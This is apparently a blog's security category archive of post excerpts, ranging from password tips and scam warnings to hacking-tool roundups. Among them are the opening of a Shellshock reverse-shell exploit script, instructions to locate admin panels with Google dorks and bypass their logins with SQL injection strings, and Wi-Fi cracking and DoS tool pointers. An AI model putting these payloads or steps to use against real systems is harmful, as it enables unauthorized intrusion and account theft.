Category Archives: Security

The best VPNs for Linux in 2018 (and the worst)

Ubuntu, Fedora, OpenSUSE, and Mint users often get the short end of the stick when it comes to software, and VPN services are no different. Let’s be honest: Linux users are low on the priority list for most companies and developers. That’s why we set out to find the best

Airport lounge

Hacker Builds a QR Code Generator That Lets Him Into Fancy Airport Lounges http://gizmodo.com/hacker-builds-a-qr-code-generator-that-lets-him-into-fa-1784884083/amp

WhatsApp News hidden features

FACEBOOK OPTION (iOS, Android and Windows Phone). You probably already knew that WhatsApp will add a Facebook option in its application. The Facebook option was born in the 2.12.14 iOS version as a hidden feature and it was available in the 2.12.15 (iOS version) if you reinstalled it (WhatsApp developers did

Ps4 hack

Watch homebrew code run Steam games on the PS4 http://www.engadget.com/2016/05/22/steam-on-ps4-demo/

Lots of reasons NOT TO use Windows OS anymore

Microsoft is part of NSA’s mass surveillance program “PRISM”: https://en.wikipedia.org/wiki/PRISM_(surveillance_program) Microsoft informs the NSA about bugs before fixing them: https://archive.is/OBGB1 Microsoft openly offers cloud data to support PRISM: https://archive.is/tW6fu Microsoft has backdoored its disk encryption: https://archive.is/2XIvX · https://archive.is/qLRZx Windows snoops on the users’ files, text input, voice input, location, contacts,

SecurityXploded

SecurityXploded – the community division of XenArmor – is a popular Infosec Research & Development organization offering FREE Security Software, latest Research Articles and FREE Training on Reverse Engineering & Malware Analysis. So far we have released 200+ FREE security software tools that have crossed over 10 Million Downloads worldwide. Most

1Block

Secure, passwordless authentication using Blockchain technology. This is very interesting; check the link above. Web sites and applications shouldn’t have to rely on problematic identification methods such as usernames and passwords. This is a human problem. This is a customer support problem. This is an industry problem. Using 1Block for

10 Worst Internet Security Mistakes

1) “password” When you are choosing your passwords, what do you normally do? Do you optimize your passwords to the best security you can manage, or do you just type in “password” all of the time and let it be? You should never pick a simple password, anyone

Top 25 Worst Passwords of 2015

123456, password, 12345678, qwerty, 12345, 123456789, football, 1234, 1234567, baseball, welcome, 1234567890, abc123, 111111, 1qaz2wsx, dragon, master, monkey, letmein, login, princess, qwertyuiop, solo, passw0rd, starwars

2016’s Biggest Phishing traps

Something to be aware of in 2016. Put them in your diary. January – Samsung Galaxy S7 launch; 27th Feb – 6 nations, rugby, England vs Ireland at Twickenham; Feb to March – 6 nations continues; 6 March – Mother’s day; 16th March – Chancellor delivers the budget

What is Penetration Testing?… And Tools

What is Penetration Testing? It’s a method of testing in which suspected security weaknesses in software systems are put to the test to determine whether a ‘weak point’ is indeed one that can be broken into. Performed for: Websites/Servers/Networks. How is it performed? Step #1. It starts

Five free pen-testing tools

Security assessment and deep testing don’t require a big budget. Some of the most effective security tools are free, and are commonly used by professional consultants, private industry and government security practitioners. Here are a few to start with. For scanning in the first steps of a security assessment or pen

5 Tips to Reduce Risk from Web Threats

1. Keep your systems patched and up to date. Keeping systems fully up to date—including the operating system, web browsers, browser plugins, media players, PDF readers and other applications—can be a tedious, annoying and time-consuming ongoing task. Unfortunately, hackers are counting on most people to fall far short of what’s

Apple Mac persistent rootkit malware June 2015

Symantec says a critical vulnerability within some Apple Mac models could allow hackers to inject systems with persistent rootkit malware. The security firm confirmed the existence of the security flaw late on Thursday. The flaw, called the Apple Mac OS X EFI Firmware Security Vulnerability, was originally disclosed last week

Password Establishment Protocol

Network Working Group; Thomas Brownback. Request for Comments: xxxx; Independent Researcher. Category: Experimental

Denial of Service Tools

Careful with this one, as antivirus marks it as positive. In computing, a denial of service (DoS) or distributed denial of service (DDoS) attack is an attempt to make a machine or network resource unavailable to its intended users. A DoS attack generally consists of efforts to temporarily

Promologic.com – Possible SCAM

They send an email asking to put an advert on your blog, like a freelancer called John. The company looks American, without any history behind it. The email is sent from an ADSL connection, as below. IP: 188.129.87.171 Name: cpe-188-129-87-171.dynamic.amis.hr Country: HR – Croatia

LLT Consulting company – Possible SCAM!

Be careful with these. You will probably receive an email like this: Hello! My name is Josephine Bergson representing the advertising department of the LLT Consulting company. We are interested to place ads (banners), of your choice, on your websites. Design and sizes can be seen on our website

McAfee Free Tools

McAfee is committed to your security and provides an assortment of free McAfee tools to help in your software development. Simply select a tool and download it for free. For more details, read the McAfee Software Free Tools. There are lots, and most are extremely useful. Nice one guys!

7 Worst stealth attacks in IT

Today’s most ingenious malware and hackers are just as stealthy and conniving. Here are some of the latest techniques of note that have piqued my interest as a security researcher and the lessons learned. Some stand on the shoulders of past malicious innovators, but all are very much in vogue

Splash Data report on Bad Passwords

While a lot of attention is given to high profile account breaches, the truth is many passwords are next to useless because of their simplicity. Each year, SplashData releases its list of the worst passwords. Many atop the latest list are repeat offenders, such as the top two, “123456” and

SQL INJECTION STRINGS LIST

SQL injection is a technique often used to attack data driven applications. This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker).

List of Dorks to find Admin Panel of a Website.

Copy and paste one of the dorks from the list below into the Google search engine. When the admin panel opens, paste these SQL injection strings into the username and password fields and click login. Change it if you own a website! login.htm login.html login/ adm/ admin/ admin/account.html admin/login.html admin/login.htm admin/controlpanel.html

The Gentleman’s Guide To Forum Spies (spooks, feds, etc.)

COINTELPRO Techniques for dilution, misdirection and control of an internet forum; Twenty-Five Rules of Disinformation; Eight Traits of the Disinformationalist; How to Spot a Spy (Cointelpro Agent); Seventeen Techniques for Truth Suppression. COINTELPRO Techniques for dilution, misdirection and control of an internet forum. There

Why Do People Get Computer Viruses

No one likes to find out that they’ve picked up one of the many widespread computer viruses from being online. Yet so many people are unaware of the things online that can cause damage to their system. If you’ve come to the web in hopes…

The Most Notorious Computer Viruses

Thinking of throwing away your laptop due to a malfunction of some type? Has a part of your laptop suddenly stopped functioning correctly? Is a program which used to run fine all of a sudden going haywire? Before you chalk it up to hardware…

Crack WI-FI methods

Depends on the encryption of the wifi. If it’s WEP, then it’s generally fairly easy to crack using Aircrack-ng. However, WPA/WPA2 will need to be forced with the following methods; these are just a few to keep in mind: - The evil twin method: Launch a DoS (via De-auth requests)

South Korean Malware Attack

Executive Summary. Reporting and technical details surrounding the malware used in the March 20, 2013, attack on South Korean assets have been varied and inconsistent. However, there are some commonalities reported across multiple organizations that provide some level of insight into the malware, dubbed DarkSeoul. The common attributes of

10 Android hacking tools

Let’s see 10 Android tools that are meant for hacking and hackers. 1. Hackode: The hacker’s Toolbox is an application for penetration testers, ethical hackers, IT administrators and cyber security professionals to perform different tasks like reconnaissance, scanning, performing exploits etc. 2. Androrat: Remote Administration Tool for Android. Androrat is a client/server

Perfect OS for hacking.

Anonymous released their own operating system, based on Ubuntu and Mate. Should we download it…no, not really as they usually add trojans and malware in it…so you hack and then you get hacked…not funny. Kali Linux, BackTrack OS, yes, but as above paranoia it’s in me so… best solution.

Anonymous Tips

  This is a simple guide for noobs on how to stay anonymous and safe in the clearweb and the darknet. If it seems “too good to be true” you better bet your ass it’s a scam! Assume everything is being monitored 24/7, is hacked/malware attacks, keyloggers, LEO/spies, and that

Intrusive Surveillance

Intrusive Surveillance basically means any type of surveillance that is occurring due to some form of intrusion into your machine. As such, it is the most difficult form of “forensics” to defend against, since doing so involves the securing and hardening of your operating system against attack. While keeping up

Network Attributes of your computer

  MAC Address Every 802.x network card (wireless, ethernet, token ring) has a unique 48 bit identifier known as a MAC address. This address is burned into the EEPROM on the card, and oftentimes is used by networking equipment to track users as they come and go, frequently associating MAC

Passwords/ Passwords (Thanks anonymous)

Choosing a Strong Password by @voodookobra – Educational article, great explanation. https://scott.arciszewski.me/blog/2014/08/choosing-strong-password Guide for creating strong passwords – Older article but still good info http://www.thegeekstuff.com/2008/06/the-ultimate-guide-for-creating-strong-passwords/ Passwords: Here’s how to make them harder to crack. > http://www.pcadvisor.co.uk/how-to/security/3446212/passwords-youre-doing-it-wrong-heres-how-to-make-them-uncrackable/ Handy tool for generating strong passwords > http://strongpasswordgenerator.com/ Passphrase generating tool > https://entima.net/diceware/ The

Snow Leopard bash vulnerability

Snow Leopard is vulnerable and I am told more recent versions are too. The patch for Linux issued today didn’t fix it completely, so there will be another patch tomorrow. Execute the following: env x='() { :;}; echo vulnerable' bash -c "echo this is a test" Apparently, the proper behaviour is:

CVE-2014-6271 cgi-bin reverse shell (shellshock)

# #CVE-2014-6271 cgi-bin reverse shell # import httplib,urllib,sys if (len(sys.argv)<3):         print “Usage: %s <host> <vulnerable CGI>” % sys.argv[0]         print “Example: %s localhost /cgi-bin/test.cgi” % sys.argv[0]         exit(0) conn = httplib.HTTPConnection(sys.argv[1]) reverse_shell=“() { ignored;};/bin/bash -c ‘/bin/rm -f /tmp/f; /usr/bin/mkfifo /tmp/f;cat

ShellShock CVE-2014-6271

SETLOCAL ENABLEDELAYEDEXPANSION @echo off cls REM Windows ShellShock Vulnerability CVE-2014-6271 Scanner REM Version 1u0 <Initial release> REM 2014-09-25 REM By Taylor Swift (taylorswift -at- swiftonsecurity.com) title Windows ShellShock Vulnerability Scanner echo. echo =============== echo  Windows ShellShock Vulnerability CVE-2014-6271 Scanner echo    by Taylor Swift echo =============== echo. echo. echo PLEASE WAIT,

Hack into someone’s Facebook account

In this article I’ll show you these, and a couple other ways that hackers (and even regular folks) can hack into someone’s Facebook account. But don’t worry, I’ll also show you how to prevent it from happening to you. Method 1: Reset the Password The easiest way to “hack” into

You can steal data from a computer by touching it

by Jon Fingas |  Normally, breaking a PC’s security involves either finding security exploits or launching brute force attacks, neither of which is necessarily quick or easy. However, a team at Tel Aviv University has come up with a potentially much simpler way to swipe data from a computer: touch it. If you

50 Hacking tools

Hacking tools have been said to make hacking quite easy as compared to the old days. But, there is still more to being a hacker than just that. Yes, these tools have made it simple, but that is nothing unless you have the knowledge about other aspects of hacking as

Google Dorks 2014 List For SQL Injection Attack


Security and Privacy Tips for the Paranoid

Turn off Java and Flash in your Web browsers. Java and Adobe Flash Player plug-ins are common points of vulnerability for many browsers. The two software platforms are useful and power a lot of interactive content on the Internet, but Justin Cappos, a professor of computer science at the Polytechnic

PROTECT YOURSELF against surveillance programs like PRISM, XKeyscore and Tempora

Credits at the end of the page. Due to extreme laziness the links are copy and paste. Ta. Warning: Microsoft Windows is affected by PRISM. Using it may compromise your privacy. We strongly recommend replacing Windows with either Linux

DoS attack tools

The following are some of the tools that can be used to perform DoS attacks. Nemesy – this tool can be used to generate random packets. It works on Windows. This tool can be downloaded from http://packetstormsecurity.com/files/25599/nemesy13.zip.html . Due to the nature of the program, if you have an antivirus,

Commonly Used Hacking Tools

The following table lists some of the most commonly used tools.
SR NO. | TOOLS | DESCRIPTION | URL Link
1 | Nmap | Network mapper. This tool is used to explore networks and perform security audits. | http://nmap.org/
2 | Nessus | This tool can be used to perform; Remote vulnerability scanner Password

Password cracking tool

These are software programs that are used to crack user passwords. We already looked at a similar tool in the above example on password strengths. The website www.md5this.com uses a rainbow table to crack passwords. We will now look at some of the commonly used tools. John the Ripper John

How to Secure wireless networks

To minimize wireless network attacks, an organization can adopt the following policies: changing default passwords that come with the hardware; enabling the authentication mechanism; restricting access to the network by allowing only registered MAC addresses; use of strong WEP and WPA-PSK keys, a combination of symbols, number and

How to Crack Wireless Networks

WEP cracking. Cracking is the process of exploiting security weaknesses in wireless networks and gaining unauthorized access. WEP cracking refers to exploits on networks that use WEP to implement security controls. There are basically two types of cracks, namely: Passive cracking – this type of cracking has no effect on the

Password security

http://www.bbc.co.uk/news/blogs-magazine-monitor-26969276 Read the above and then I’m amused by the idea that L33tSP34k is a useful form of encryption. And ob-vee-uss-lee, storing your passwords on your phone is extremely secure!   So knowing that read this i’m @mµ$¢Ð þ¥ th¢ iТ@ th@t £33t$¶34k i$ @ µ$¢ƒµ£ ƒø®m øƒ ¢n箥¶tiøn. @nÐ

Secunia PSI – Scan outdated programs

I do not normally advertise other companies. However, merit is due. This Secunia PSI is a free kit able to scan your PC and detect outdated software. It scans software on your system and identifies programs in need of security updates to safeguard your PC against intrusions on your machine.

NSA kills based on metadata

http://beta.slashdot.org/story/201869 – Former NSA director admits to ordering kills based on metadata: These are the top comments from reddit as of 10 hours after it was posted to reddit. I’ve read the articles about this program. Essentially the NSA was identifying the SIM cards that suspected militants were using and

Does antivirus have a future?

Does antivirus have a future? Creators of malware are no longer script kiddies after kudos – they’re criminals after your cash. Wendy M Grossman asks if protection can keep pace with them

Windows XP is no longer supported by Microsoft.

This means organisations running Windows XP will no longer receive: new security updates, non-security hotfixes, free/paid assisted support options or online technical content updates. Any new vulnerabilities discovered after support ends will not be addressed by Microsoft. The risks of continuing to run Windows XP include:

Hide your IP address

Hide your IP address and protect your online identity with SafeIP. Also watch BBC IPLAYER overseas…sweet.   http://www.freesafeip.com/   How can I speed up browsing using SafeIP? Selecting a location nearest to you is the best way to ensure the fastest connection speeds. From the Dashboard tab, scroll down the